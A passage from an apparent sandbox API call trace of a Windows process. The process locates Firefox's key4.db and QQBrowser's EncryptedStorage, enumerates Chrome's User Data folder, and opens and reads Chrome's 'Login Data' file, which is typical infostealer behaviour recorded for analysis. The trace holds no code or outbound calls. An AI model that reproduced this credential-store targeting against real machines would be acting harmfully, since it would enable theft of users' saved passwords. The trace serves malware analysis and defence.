nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3y2joh8o.default", cAlternateFileName="3Y2JOH~1.DEF")) returned 1 [0237.048] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bee8 | out: lpFindFileData=0x615bee8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0237.049] FindClose (in: hFindFile=0x7dcb38 | out: hFindFile=0x7dcb38) returned 1 [0237.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c170) returned 1 [0237.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c17c) returned 1 [0237.049] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key4.db", nBufferLength=0x105, lpBuffer=0x615bcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key4.db", lpFilePart=0x0) returned 0x53 [0237.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c13c) returned 1 [0237.049] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key4.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key4.db"), fInfoLevelId=0x0, lpFileInformation=0x615c1b8 | out: lpFileInformation=0x615c1b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c138) returned 1 [0237.093] GetEnvironmentVariableW (in: lpName="localappdata", lpBuffer=0x615c0dc, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x1f [0237.093] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage", nBufferLength=0x105, lpBuffer=0x615bd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage", lpFilePart=0x0) returned 0x54 [0237.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1ac) returned 1 [0237.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\EncryptedStorage" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\tencent\\qqbrowser\\user data\\default\\encryptedstorage"), fInfoLevelId=0x0, lpFileInformation=0x615c228 | out: lpFileInformation=0x615c228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1a8) returned 1 [0237.122] CoTaskMemAlloc (cb=0x20c) returned 0x79baf8 [0237.122] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79baf8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0237.122] CoTaskMemFree (pv=0x79baf8) [0237.122] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x615a554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local", lpFilePart=0x0) returned 0x1f [0237.122] CoTaskMemAlloc (cb=0x20c) returned 0x79baf8 [0237.122] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79baf8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0237.122] CoTaskMemFree (pv=0x79baf8) [0237.122] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615a554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0237.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x37 [0237.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xadcfd00, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xde226b0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xde226b0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c060) returned 1 [0237.207] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x615bb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x37 [0237.207] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x615bb3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x38 [0237.207] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x615bd88 | out: lpFindFileData=0x615bd88*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xadcfd00, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xde226b0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xde226b0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7dcb38 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xadcfd00, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xde226b0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xde226b0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xadf5e60, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xae1bfc0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xae1bfc0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadf5e60, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xadf5e60, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xadf5e60, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashpadMetrics-active.pma", cAlternateFileName="CRASHP~1.PMA")) returned 1 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb031300, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xe5b8cd0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xe5b8cd0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0237.225] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVWhitelist", cAlternateFileName="EVWHIT~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTypePolicies", cAlternateFileName="FILETY~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb057460, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb057460, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb057460, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="First Run", cAlternateFileName="FIRSTR~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda67d40, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xda67d40, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xdcf1bb0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x10ed9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local State", cAlternateFileName="LOCALS~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OriginTrials", cAlternateFileName="ORIGIN~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PepperFlash", cAlternateFileName="PEPPER~1")) returned 1 [0237.226] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc083690, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xc083690, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xc083690, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pnacl", cAlternateFileName="")) returned 1 [0237.227] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0237.227] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0237.227] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb0ef9e0, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xb0ef9e0, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xb0ef9e0, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0237.227] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bd98 | out: lpFindFileData=0x615bd98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0237.227] FindClose (in: hFindFile=0x7dcb38 | out: hFindFile=0x7dcb38) returned 1 [0237.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c020) returned 1 [0237.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c02c) returned 1 [0237.228] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7c7c30, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xc7c7c30, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xc8aad00, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1 [0237.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.242] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfec) returned 1 [0237.242] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c068 | out: lpFileInformation=0x615c068*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7c7c30, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xc7c7c30, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xc8aad00, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1 [0237.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfe8) returned 1 [0237.258] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.258] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615ba8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bae8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615ba6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.261] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bf24) returned 1 [0237.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615bfa0 | out: lpFileInformation=0x615bfa0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7c7c30, ftCreationTime.dwHighDateTime=0x1d2f18c, ftLastAccessTime.dwLowDateTime=0xc7c7c30, ftLastAccessTime.dwHighDateTime=0x1d2f18c, ftLastWriteTime.dwLowDateTime=0xc8aad00, ftLastWriteTime.dwHighDateTime=0x1d2f18c, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1 [0237.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bf20) returned 1 [0237.262] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615b9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bec0) returned 1 [0237.262] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x490 [0237.262] GetFileType (hFile=0x490) returned 0x1 [0237.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bebc) returned 1 [0237.262] GetFileType (hFile=0x490) returned 0x1 [0237.270] GetFileSize (in: hFile=0x490, lpFileSizeHigh=0x615c09c | out: lpFileSizeHigh=0x615c09c*=0x0) returned 0x4800 [0237.276] ReadFile (in: hFile=0x490, lpBuffer=0x27221ec, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x615bfa0, lpOverlapped=0x0 | out: lpBuffer=0x27221ec*, lpNumberOfBytesRead=0x615bfa0*=0x4800, lpOverlapped=0x0) returned 1 [0237.282] CloseHandle (hObject=0x490) returned 1 [0237.301] VarDecCmp (pdecLeft=0x615c08c, pdecRight=0x615c07c) returned 0x2 [0237.384] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.388] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.388] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.388] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.420] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.420] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.425] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.444] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.444] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.444] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.444] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.444] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.444] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.444] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: pdecResult=0x615b5f4) returned 0x0 [0237.445] VarDecRound (in: pdecIn=0x615b60c, cDecimals=0, pdecResult=0x615b5ec | out: pdecResult=0x615b5ec) returned 0x0 [0237.445] VarDecCmp (pdecLeft=0x615b61c, pdecRight=0x615b60c) returned 0x1 [0237.445] VarDecRound (in: pdecIn=0x615b5e4, cDecimals=0, pdecResult=0x615b5f4 | out: 